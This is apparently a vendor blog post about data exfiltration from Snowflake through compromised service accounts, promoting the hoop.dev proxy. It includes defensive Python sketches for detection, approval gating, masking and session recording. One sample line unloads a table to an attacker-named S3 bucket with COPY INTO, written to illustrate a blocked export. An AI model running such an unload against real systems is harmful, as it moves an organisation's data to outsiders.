Non-human identities: what they mean for data exfiltration on Snowflake

Imagine a CI pipeline that runs nightly analytics jobs against your Snowflake warehouse. The pipeline uses a service account whose credentials are baked into a Docker image shared across dozens of repositories. When the job finishes, it writes an artifact containing raw query results to an internal S3 bucket that anyone on the corporate network can read. A few weeks later, an off‑boarded contractor who still has a copy of the service account token discovers the bucket and downloads the data. Your security team eventually traces the breach back to the service account, but no alert ever fired, because the job's connection to Snowflake carried data out with nothing in the path to inspect or audit it. This unchecked flow is a classic data exfiltration scenario.

This scenario illustrates a common reality: non‑human identities (service accounts, CI tokens, automation keys) are often granted sweeping privileges, stored in places that are easy to copy, and used without any visibility into what they actually do. When one of those identities is compromised, the attacker inherits exactly the same level of access, which makes data exfiltration a low‑effort, high‑impact attack.

Why data exfiltration is a risk with non‑human identities

Snowflake is built for large‑scale analytics, so it tends to hold large, valuable datasets. Non‑human identities typically have long‑lived credentials that are not tied to any single person. Because they exist to run automation, they often receive read‑only or read‑write roles spanning many schemas, tables, and views. And with no human in the loop, nobody reviews the queries they execute in real time.

Two concrete weaknesses emerge:

  • Unrestricted data flow. An automation job can export an entire table to external storage with a single COPY INTO <location> command. If the job is compromised, the same command can be repurposed to ship data to an attacker‑controlled endpoint.
  • Invisible activity. Snowflake's audit logs capture who ran a query, but they do not enforce policy at the moment of execution. If a malicious script runs under the service account, the logs show only that the service account ran the query; nothing flags the abnormal data volume or destination.
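To make the second weakness concrete, here is a minimal Python sketch of the kind of check that a query log alone does not perform: it scans query records and flags unloads that went to an unapproved destination or moved an unusual number of rows. The `QueryRecord` shape, the allowlist, and the threshold are hypothetical, not a Snowflake schema.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple


# Hypothetical record shape; the field names are illustrative, not a Snowflake view.
@dataclass
class QueryRecord:
    user: str
    query_text: str
    rows_unloaded: int
    destination: Optional[str]  # where an unload wrote data; None for ordinary queries


ALLOWED_DESTINATIONS = {"@analytics_internal_stage"}  # hypothetical allowlist
MAX_ROWS_PER_UNLOAD = 1_000_000  # hypothetical volume threshold


def flag_suspicious(records: List[QueryRecord]) -> List[Tuple[QueryRecord, str]]:
    """Return (record, reason) pairs for unloads that deserve a human look."""
    flagged = []
    for rec in records:
        if rec.destination is None:
            continue  # nothing was written outside Snowflake
        if rec.destination not in ALLOWED_DESTINATIONS:
            flagged.append((rec, "unapproved destination"))
        elif rec.rows_unloaded > MAX_ROWS_PER_UNLOAD:
            flagged.append((rec, "unusual volume"))
    return flagged


records = [
    QueryRecord("svc_nightly", "SELECT * FROM orders", 0, None),
    QueryRecord("svc_nightly", "COPY INTO @analytics_internal_stage FROM orders",
                5_000, "@analytics_internal_stage"),
    QueryRecord("svc_nightly", "COPY INTO 's3://unknown-bucket/' FROM orders",
                5_000, "s3://unknown-bucket/"),
]
for rec, reason in flag_suspicious(records):
    print(rec.destination, reason)  # s3://unknown-bucket/ unapproved destination
```

A check like this is detective, not preventive: by the time it flags the unload, the rows have already left the warehouse.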

Both issues stem from a missing enforcement point. The identity system decides who may start a session, but once the session is established, Snowflake itself does not inspect or block the data leaving the system in real time.

What a proper enforcement layer looks like

The missing piece is a gateway that sits on the data path between the non‑human identity and Snowflake. The gateway must be able to:

  • Inspect every query before it reaches Snowflake.
  • Require just‑in‑time approval for commands that export data.
  • Mask sensitive columns in query results when the request originates from an automated job.
  • Record the entire session for replay and forensic analysis.
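As an illustration of the first two capabilities, here is a minimal sketch of a pre-execution policy decision, assuming the gateway sees each SQL statement as text before forwarding it. The `Decision` values and rules are hypothetical, not hoop.dev's implementation: the sketch treats `COPY INTO` a named stage as an export that needs approval and refuses inline cloud-storage URLs outright. A production gateway would parse SQL rather than pattern-match, since comments, multi-statement batches, and other export paths would slip past a regex.

```python
import re
from enum import Enum


class Decision(Enum):
    ALLOW = "allow"
    REQUIRE_APPROVAL = "require_approval"
    BLOCK = "block"


# Matches COPY INTO <location> when the target is a stage (@name, @~, @%table)
# or an inline URL such as 's3://...'. COPY INTO <table> loads data *into*
# Snowflake, so it does not match and is not treated as an export.
_UNLOAD = re.compile(r"^\s*COPY\s+INTO\s+(@\S+|'[a-z0-9]+://[^']*')", re.IGNORECASE)


def decide(sql: str) -> Decision:
    """Classify one statement before it is forwarded to Snowflake."""
    match = _UNLOAD.match(sql)
    if match is None:
        return Decision.ALLOW
    if match.group(1).startswith("'"):
        # Inline URLs skip any reviewed, named stage: refuse them outright.
        return Decision.BLOCK
    # Unloads to a named stage pause until a human approves them.
    return Decision.REQUIRE_APPROVAL


print(decide("SELECT id, total FROM orders"))                        # Decision.ALLOW
print(decide("COPY INTO @exports/orders/ FROM orders"))              # Decision.REQUIRE_APPROVAL
print(decide("COPY INTO 's3://attacker-bucket/dump/' FROM orders"))  # Decision.BLOCK
```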

Only when these controls are enforced at the gateway can you be confident that a service account cannot be abused to exfiltrate data without detection.

How hoop.dev stops data exfiltration

hoop.dev acts as a Layer 7 identity‑aware proxy that sits in front of Snowflake. When a non‑human identity attempts to connect, hoop.dev authenticates the token, checks group membership, and then forwards the request through its data‑path engine. Because all traffic passes through hoop.dev, it can enforce the controls listed above.
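The authenticate-then-authorize step can be sketched as follows, under stated assumptions: tokens are stored only as SHA-256 digests, and each registered connection lists the groups allowed to use it. `TOKENS`, `CONNECTION_GROUPS`, and `authorize` are hypothetical names for illustration, not hoop.dev's API.

```python
import hashlib
from dataclasses import dataclass
from typing import Dict, FrozenSet, Optional, Set


@dataclass(frozen=True)
class Identity:
    name: str
    groups: FrozenSet[str]


def _digest(token: str) -> str:
    # Store and compare only SHA-256 digests, never raw tokens.
    return hashlib.sha256(token.encode("utf-8")).hexdigest()


# Hypothetical token store and connection policy, for illustration only.
TOKENS: Dict[str, Identity] = {
    _digest("example-token-nightly"): Identity("svc_nightly", frozenset({"analytics-jobs"})),
}
CONNECTION_GROUPS: Dict[str, Set[str]] = {"snowflake-prod": {"analytics-jobs"}}


def authorize(token: str, connection: str) -> Optional[Identity]:
    """Return the caller's identity if it may use `connection`, else None."""
    identity = TOKENS.get(_digest(token))
    if identity is None:
        return None  # unknown, rotated, or revoked token: reject before any traffic flows
    if identity.groups.isdisjoint(CONNECTION_GROUPS.get(connection, set())):
        return None  # authenticated, but not in a group permitted on this connection
    return identity  # hand off to the data-path checks (inspection, masking, recording)
```

In this model, rotating a leaked service account token means replacing one entry in the store; the old copy then fails at the gateway instead of reaching Snowflake.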

Specifically, hoop.dev records each session, so you have a replay of every query and response. It can mask columns containing personally identifiable information inline, so downstream automation never sees raw values. For any command that attempts to write to external storage, hoop.dev triggers a just‑in‑time approval workflow: the request pauses until an authorized human approves the export. If a command is deemed unsafe, hoop.dev blocks it before Snowflake ever sees it. All of these outcomes exist because hoop.dev sits in the data path, not because the identity provider or Snowflake itself provides them.
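Inline masking and session recording can be sketched together: rows returned to an automated caller have their PII columns replaced before they leave the gateway, and the recorder keeps each query alongside the response the caller actually received. `PII_COLUMNS`, `mask_rows`, and `SessionRecorder` are illustrative assumptions, not hoop.dev's masking engine or storage format.

```python
import time
from dataclasses import dataclass, field
from typing import Any, Dict, Iterator, List, Tuple

Row = Dict[str, Any]

PII_COLUMNS = {"email", "phone", "ssn"}  # hypothetical; a real policy would drive this


def mask_rows(rows: List[Row], is_automated: bool) -> List[Row]:
    """Replace non-null PII values with a fixed mask when the caller is an automated job."""
    if not is_automated:
        return rows
    return [
        {
            col: "****" if col.lower() in PII_COLUMNS and val is not None else val
            for col, val in row.items()
        }
        for row in rows
    ]


@dataclass
class SessionRecorder:
    identity: str
    events: List[Dict[str, Any]] = field(default_factory=list)

    def record(self, query: str, rows: List[Row]) -> None:
        # Keep the response exactly as the caller received it (already masked).
        self.events.append({"ts": time.time(), "query": query, "rows": rows})

    def replay(self) -> Iterator[Tuple[str, List[Row]]]:
        for event in self.events:
            yield event["query"], event["rows"]


recorder = SessionRecorder("svc_nightly")
shown = mask_rows([{"id": 1, "email": "a@example.com", "total": 42}], is_automated=True)
recorder.record("SELECT id, email, total FROM orders", shown)
print(shown)  # [{'id': 1, 'email': '****', 'total': 42}]
```

Recording the masked response keeps PII out of the replay log as well; whether a deployment should also retain raw results is a separate policy decision.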

To get started, follow the getting‑started guide and review the feature documentation. The open‑source repository contains the full implementation and examples for Snowflake.

FAQ

Q: Does hoop.dev replace Snowflake’s native audit logs?
A: No. hoop.dev complements Snowflake’s logs by adding real‑time session recording and inline masking that Snowflake does not provide on its own.

Q: Can I use hoop.dev with existing service accounts?
A: Yes. You register the Snowflake connection in hoop.dev and point your automation to the hoop.dev endpoint; the original credentials stay hidden inside the gateway.

Q: What happens if a malicious script tries to bypass the gateway?
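A: If network policies leave hoop.dev as the only path to Snowflake for that identity (for example, a Snowflake network policy that accepts the service account's connections only from the gateway's IP addresses), any direct connection attempt is rejected. The gateway is the enforced boundary.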

Explore the source code, contribute improvements, and see how the community secures data pipelines on GitHub: https://github.com/hoophq/hoop.
